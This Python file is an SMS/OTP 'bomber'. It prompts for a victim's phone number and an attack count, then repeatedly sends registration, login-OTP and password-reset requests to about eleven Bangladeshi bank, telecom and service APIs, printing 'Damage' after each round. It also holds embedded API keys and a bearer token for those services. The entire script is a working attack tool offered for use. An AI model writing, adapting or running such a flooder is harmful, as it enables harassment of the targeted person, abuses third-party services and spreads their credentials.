import requests
from requests.structures import CaseInsensitiveDict

green = '\033[1;32m'
end = '\033[0m'
print (green+"""  _______ _    _ _  _____                                         
 |__   __| |  | (_)/ ____|                                        
    | |  | |__| |_| (___                                          
    | |  |  __  | |\___ \                                         
    | |  | |  | | |____) |                                        
   _|_|_ |_|  |_|_|_____/____   __  __                            
  / ____|      / ____|__   __| |  \/  |                           
 | (___  _   _| (___    | | ___| \  / |                           
  \___ \| | | |\___ \   | |/ _ \ |\/| |                           
  ____) | |_| |____) |  | |  __/ |  | |                           
 |_____/ \__, |_____/___|_|\___|_|  |_|                           
  / ____| __/ |     |__   __|                                     
 | |     |___/___  __ _| | ___  _ __                              
 | |    | '__/ _ \/ _` | |/ _ \| '__|                             
 | |____| | |  __/ (_| | | (_) | |                                
  \_____|_|  \___|\__,_|_|\___/|_|                                
 |  _ \                                                           
 | |_) |_   _                                                     
 |  _ <| | | |                                                    
 | |_) | |_| |                                                    
 |____/ \__, |                                                    
         __/ |                                                    
   __  _|___/ _____         _____ _    _       _  ___ ____   __   
  / / | |  | |  __ \       / ____| |  | |     | |/ (_)  _ \  \ \  
 | |  | |__| | |  | |_____| (___ | |__| | __ _| ' / _| |_) |  | | 
 | |  |  __  | |  | |______\___ \|  __  |/ _` |  < | |  _ <   | | 
 | |  | |  | | |__| |      ____) | |  | | (_| | . \| | |_) |  | | 
 | |  |_|  |_|_____/      |_____/|_|  |_|\__,_|_|\_\_|____/   | | 
  \_\                                                        /_/  
                                                                  """+end)

# CVALUE
blue = '\33[94m'
lightblue = '\033[94m'
red = '\033[91m'
white = '\33[97m'
yellow = '\33[93m'
green = '\033[1;32m'
cyan = "\033[96m"
end = '\033[0m'
print ("\033[32m")

print ("	 -!-!- WeLcOmE-!-!- ( HD-SHaKiiB ) ( GhOsToFKiinG ) ")


print ("""


   ╔═════════════════════════════════╗
   ║ AuTHor   : SHaKiiB ツ           ║
   ║ FaCeBooK : iTzSHaKiiB           ║
   ║ GitHuB   : iTzSHaKiB            ║
   ╚═════════════════════════════════╝




""")

number  = str(input("[>] Heii Sir.... apNar aTTack NumBer DiN: "))


amount = int(input("[>] Sir.... apNar aTTack ar PoriMaN LikHuN: "))

url1 = "https://ezybank.dhakabank.com.bd/VerifIDExt2/api/CustOnBoarding/VerifyMobileNumber"

headers1 = CaseInsensitiveDict()

headers1["Content-Type"]="application/json; charset=UTF-8"

data1 = '{"AccessToken":"","TrackingNo":"","mobileNo":"'+number+'","otpSms":"","product_id":"250","requestChannel":"MOB","trackingStatus":5}'



url4 = "https://green-delta.com/api/api.php?action=userRegistrationForm"

headers4 = CaseInsensitiveDict()
headers4["Content-Type"] = "application/x-www-form-urlencoded; charset=UTF-8"

data4 = "firstname=KiinG&lastname=OF+GhOsT&userphone="+number+"&useremail=mdsimohoncircleking%40gmail.com&usernid=2155464684048&date_of_birth=2022-03-31&userpassword=mmmmmm&userconfirmpassword=mmmmmm&useRegistration=Registration"

url5 = "http://nesco.sslwireless.com:80/api/v1/login"

headers5 = CaseInsensitiveDict()
headers5["Content-Type"] = "application/x-www-form-urlencoded"

data5 = "phone_number="+number


url = "https://rootsedulive.com/api/auth/register"

headers = CaseInsensitiveDict()
headers["Content-Type"] = "application/json"


data = '{"name":"ghostofkiing@gmail.com","phone":"88'+number+'","email":"ghostofkiing@gmail.com","password":"mmmmmmmm","confirmPassword":"mmmmmmmm"}'

url7 = "https://rootsedulive.com/api/auth/forget-password"

headers7 = CaseInsensitiveDict()
headers7["Content-Type"] = "application/json"

data7 = '{"phoneOrEmail":"88'+number+'"}'

url11 = "https://prodapi.swap.com.bd/api/v1/send-otp/login"

headers11 = CaseInsensitiveDict()

headers11["X-Authorization"]= "QoFN68MGTcosJxSmDf5GCgxXlNcgE1mUH9MUWuDHgs7dugjR7P2ziASzpo3frHL3"

headers11["Content-Type"] = "application/json;charset=utf-8"

data11 = '{"mobile_number":"'+number+'","referral":false}'

url12 = "https://webapi.robi.com.bd/v1/account/register/otp"

headers12 = CaseInsensitiveDict()

headers12["Content-Type"] = "application/json;charset=utf-8"

headers12["Authorization"] = "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL3dlYmFwaS5yb2JpLmNvbS5iZC92MS90b2tlbiIsImlhdCI6MTY1MDM0MzI4NCwiZXhwIjoxNjUwNDI5Njg0LCJuYmYiOjE2NTAzNDMyODQsImp0aSI6IkRDV1I2ekh0TWxnb1ZvTXoiLCJzdWIiOiJSb2JpV2ViU2l0ZSJ9.f6KGGOIU9nHe1rIvNzQpq-1LZ7yI1yyy_cJBEs_jOnI"

data12 = '{"phone_number":"'+number+'"}'

url13 = "https://circle.robi.com.bd/mylife/appapi/appcall.php?op=getOTC&pin=13001&app_version=79&msisdn=88"+number

headers13 = CaseInsensitiveDict()
headers13["x-app-key"] = "000oc0so48owkw4s0wwo4c00g00804w80gwkw8kg"
headers13["User-Agent"]="gzip"

url15 = "http://27.131.15.19/lstyle/api/lsotprequest"

headers15 = CaseInsensitiveDict()

headers15["Content-Length"]="48"

headers15["Content-Type"]="application/json"

data15 = """{
  \"shortcode\": \"2494905\",
  \"msisdn\": \"88"""+number+"""\"
}"""

url16 = "http://lpin.dev.mpower-social.com:6001/usermodule/otp_mobile/?mobile_no="+number+"&email=&verification_type=registration"

url2 = "https://poshorabd.com/send-otp-for-new-user?phone_num="+number



for i in range(amount):
	try:
		
		resp2 = requests.get(url2)
		
		resp1 = requests.post(url1, headers=headers1, data=data1)
		
		resp = requests.post(url, headers=headers, data=data)
		
		resp4 = requests.post(url4, headers=headers4, data=data4)
		
		resp5= requests.post(url5, headers=headers5,  data=data5)
		
		resp7 = requests.post(url7, headers=headers7,  data=data7)
		
		resp11 = requests.post(url11, headers=headers11, data=data11)
		
		resp12 = requests.post(url12, headers=headers12, data=data12)
		
		resp13 = requests.post(url13, headers=headers13)
		
		resp15 = requests.post(url15, headers=headers15, data=data15)
		
		resp16 = requests.get(url16)

		print(str (i+1)+" Damage \n")

	except:
		print ("Please Make Sure Your Internet Connection")